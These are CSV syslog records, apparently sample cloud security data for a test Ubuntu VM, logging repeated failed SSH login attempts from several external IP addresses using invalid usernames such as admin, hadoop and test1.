+18765,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:03,UbuntuDevEnv,2019-06-26 10:45:02,auth,UbuntuDevEnv,info,Failed password for invalid user uftp from 106.13.142.247 port 50262 ssh2,88648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,106.13.142.2,50262,,
+18766,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:03,UbuntuDevEnv,2019-06-26 10:45:02,auth,UbuntuDevEnv,info,Disconnected from invalid user uftp 106.13.142.247 port 50262 [preauth],88648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,uftp,106.13.142.2,50262,,
+18767,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:03,UbuntuDevEnv,2019-06-26 10:45:02,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 50262:11: Bye Bye [preauth],88648,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,50262,,
+18768,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:28,UbuntuDevEnv,2019-06-26 10:45:28,auth,UbuntuDevEnv,info,Invalid user ez from 47.44.115.81 port 51446,88835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,47.44.115.8,51446,,
+18769,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:28,UbuntuDevEnv,2019-06-26 10:45:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18770,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:28,UbuntuDevEnv,2019-06-26 10:45:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,88835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18771,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:31,UbuntuDevEnv,2019-06-26 10:45:30,auth,UbuntuDevEnv,info,Failed password for invalid user ez from 47.44.115.81 port 51446 ssh2,88835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,47.44.115.8,51446,,
+18772,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:31,UbuntuDevEnv,2019-06-26 10:45:30,auth,UbuntuDevEnv,info,Disconnected from invalid user ez 47.44.115.81 port 51446 [preauth],88835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ez,47.44.115.8,51446,,
+18773,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:31,UbuntuDevEnv,2019-06-26 10:45:30,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 51446:11: Bye Bye [preauth],88835,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,51446,,
+18774,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:40,UbuntuDevEnv,2019-06-26 10:45:39,auth,UbuntuDevEnv,info,Invalid user test1 from 200.209.174.76 port 40658,88883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,200.209.174.7,40658,,
+18775,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:40,UbuntuDevEnv,2019-06-26 10:45:39,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=200.209.174.76,88883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,200.209.174.7,,0,
+18776,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:40,UbuntuDevEnv,2019-06-26 10:45:39,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,88883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18777,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:42,UbuntuDevEnv,2019-06-26 10:45:42,auth,UbuntuDevEnv,info,Failed password for invalid user test1 from 200.209.174.76 port 40658 ssh2,88883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,200.209.174.7,40658,,
+18778,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:43,UbuntuDevEnv,2019-06-26 10:45:42,auth,UbuntuDevEnv,info,Received disconnect from 200.209.174.76 port 40658:11: Bye Bye [preauth],88883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,200.209.174.7,40658,,
+18779,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:45:43,UbuntuDevEnv,2019-06-26 10:45:42,auth,UbuntuDevEnv,info,Disconnected from invalid user test1 200.209.174.76 port 40658 [preauth],88883,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test1,200.209.174.7,40658,,
+18780,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:19,UbuntuDevEnv,2019-06-26 10:46:19,auth,UbuntuDevEnv,info,Invalid user operator from 37.59.6.106 port 39236,89028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,37.59.6.1,39236,,
+18781,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:19,UbuntuDevEnv,2019-06-26 10:46:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18782,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:19,UbuntuDevEnv,2019-06-26 10:46:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,89028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18783,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:21,UbuntuDevEnv,2019-06-26 10:46:20,auth,UbuntuDevEnv,info,Failed password for invalid user operator from 37.59.6.106 port 39236 ssh2,89028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,37.59.6.1,39236,,
+18784,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:21,UbuntuDevEnv,2019-06-26 10:46:20,auth,UbuntuDevEnv,info,Disconnected from invalid user operator 37.59.6.106 port 39236 [preauth],89028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,operator,37.59.6.1,39236,,
+18785,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:21,UbuntuDevEnv,2019-06-26 10:46:20,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 39236:11: Bye Bye [preauth],89028,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,39236,,
+18786,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:40,UbuntuDevEnv,2019-06-26 10:46:40,auth,UbuntuDevEnv,info,Invalid user canna from 106.13.142.247 port 34286,89089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,canna,106.13.142.2,34286,,
+18787,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:40,UbuntuDevEnv,2019-06-26 10:46:40,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,89089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18788,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:40,UbuntuDevEnv,2019-06-26 10:46:40,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18789,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:43,UbuntuDevEnv,2019-06-26 10:46:42,auth,UbuntuDevEnv,info,Failed password for invalid user canna from 106.13.142.247 port 34286 ssh2,89089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,canna,106.13.142.2,34286,,
+18790,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:44,UbuntuDevEnv,2019-06-26 10:46:43,auth,UbuntuDevEnv,info,Disconnected from invalid user canna 106.13.142.247 port 34286 [preauth],89089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,canna,106.13.142.2,34286,,
+18791,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:46:44,UbuntuDevEnv,2019-06-26 10:46:43,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 34286:11: Bye Bye [preauth],89089,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,34286,,
+18792,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:24,UbuntuDevEnv,2019-06-26 10:47:23,auth,UbuntuDevEnv,info,Disconnected from 45.80.39.228 port 32968 [preauth],89258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.80.39.2,32968,,
+18793,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:24,UbuntuDevEnv,2019-06-26 10:47:23,auth,UbuntuDevEnv,info,Received disconnect from 45.80.39.228 port 32968:11: Bye Bye [preauth],89258,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.80.39.2,32968,,
+18794,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:43,UbuntuDevEnv,2019-06-26 10:47:42,auth,UbuntuDevEnv,info,Invalid user transfer from 47.44.115.81 port 40460,89312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,47.44.115.8,40460,,
+18795,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:43,UbuntuDevEnv,2019-06-26 10:47:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18796,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:43,UbuntuDevEnv,2019-06-26 10:47:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=47.44.115.81,89312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,47.44.115.8,,0,
+18797,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:45,UbuntuDevEnv,2019-06-26 10:47:44,auth,UbuntuDevEnv,info,Failed password for invalid user transfer from 47.44.115.81 port 40460 ssh2,89312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,47.44.115.8,40460,,
+18798,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:45,UbuntuDevEnv,2019-06-26 10:47:44,auth,UbuntuDevEnv,info,Disconnected from invalid user transfer 47.44.115.81 port 40460 [preauth],89312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,transfer,47.44.115.8,40460,,
+18799,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:45,UbuntuDevEnv,2019-06-26 10:47:44,auth,UbuntuDevEnv,info,Received disconnect from 47.44.115.81 port 40460:11: Bye Bye [preauth],89312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,47.44.115.8,40460,,
+18800,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:48,UbuntuDevEnv,2019-06-26 10:47:48,auth,UbuntuDevEnv,info,Invalid user hadoop from 37.59.6.106 port 56176,89341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,37.59.6.1,56176,,
+18801,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:48,UbuntuDevEnv,2019-06-26 10:47:48,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,89341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18802,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:48,UbuntuDevEnv,2019-06-26 10:47:48,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18803,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:51,UbuntuDevEnv,2019-06-26 10:47:50,auth,UbuntuDevEnv,info,Failed password for invalid user hadoop from 37.59.6.106 port 56176 ssh2,89341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,37.59.6.1,56176,,
+18804,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:51,UbuntuDevEnv,2019-06-26 10:47:50,auth,UbuntuDevEnv,info,Disconnected from invalid user hadoop 37.59.6.106 port 56176 [preauth],89341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,hadoop,37.59.6.1,56176,,
+18805,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:47:51,UbuntuDevEnv,2019-06-26 10:47:50,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 56176:11: Bye Bye [preauth],89341,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,56176,,
+18806,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:48:14,UbuntuDevEnv,2019-06-26 10:48:14,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247  user=gnats,89424,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,gnats,106.13.142.2,,0,
+18807,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:48:16,UbuntuDevEnv,2019-06-26 10:48:15,auth,UbuntuDevEnv,info,Failed password for gnats from 106.13.142.247 port 46542 ssh2,89424,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,46542,,
+18808,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:48:16,UbuntuDevEnv,2019-06-26 10:48:15,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 46542:11: Bye Bye [preauth],89424,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,46542,,
+18809,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:48:16,UbuntuDevEnv,2019-06-26 10:48:15,auth,UbuntuDevEnv,info,Disconnected from authenticating user gnats 106.13.142.247 port 46542 [preauth],89424,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,gnats,106.13.142.2,46542,,
+18810,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:48:39,UbuntuDevEnv,2019-06-26 10:48:39,auth,UbuntuDevEnv,info,Connection closed by 59.25.92.162 port 50114 [preauth],89452,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,59.25.92.1,50114,,
+18811,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:14,UbuntuDevEnv,2019-06-26 10:49:13,auth,UbuntuDevEnv,info,Invalid user tim from 37.59.6.106 port 44910,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,37.59.6.1,44910,,
+18812,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:14,UbuntuDevEnv,2019-06-26 10:49:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18813,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:14,UbuntuDevEnv,2019-06-26 10:49:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=37.59.6.106,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,37.59.6.1,,0,
+18814,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:16,UbuntuDevEnv,2019-06-26 10:49:15,auth,UbuntuDevEnv,info,Failed password for invalid user tim from 37.59.6.106 port 44910 ssh2,89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,37.59.6.1,44910,,
+18815,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:16,UbuntuDevEnv,2019-06-26 10:49:15,auth,UbuntuDevEnv,info,Received disconnect from 37.59.6.106 port 44910:11: Bye Bye [preauth],89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,37.59.6.1,44910,,
+18816,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:16,UbuntuDevEnv,2019-06-26 10:49:15,auth,UbuntuDevEnv,info,Disconnected from invalid user tim 37.59.6.106 port 44910 [preauth],89642,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tim,37.59.6.1,44910,,
+18817,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:48,UbuntuDevEnv,2019-06-26 10:49:47,auth,UbuntuDevEnv,info,Invalid user admin from 106.13.142.247 port 58798,89761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,58798,,
+18818,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:48,UbuntuDevEnv,2019-06-26 10:49:47,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+18819,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:48,UbuntuDevEnv,2019-06-26 10:49:47,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=106.13.142.247,89761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,106.13.142.2,,0,
+18820,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:50,UbuntuDevEnv,2019-06-26 10:49:49,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 106.13.142.247 port 58798 ssh2,89761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,58798,,
+18821,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:50,UbuntuDevEnv,2019-06-26 10:49:49,auth,UbuntuDevEnv,info,Received disconnect from 106.13.142.247 port 58798:11: Bye Bye [preauth],89761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,106.13.142.2,58798,,
+18822,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:50,UbuntuDevEnv,2019-06-26 10:49:49,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 106.13.142.247 port 58798 [preauth],89761,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,106.13.142.2,58798,,
+18823,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:51,UbuntuDevEnv,2019-06-26 10:49:51,auth,UbuntuDevEnv,info,Invalid user taxi from 47.44.115.81 port 57704,89774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,taxi,47.44.115.8,57704,,
+18824,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 10:49:51,UbuntuDevEnv,2019-06-26 10:49:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,89774,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
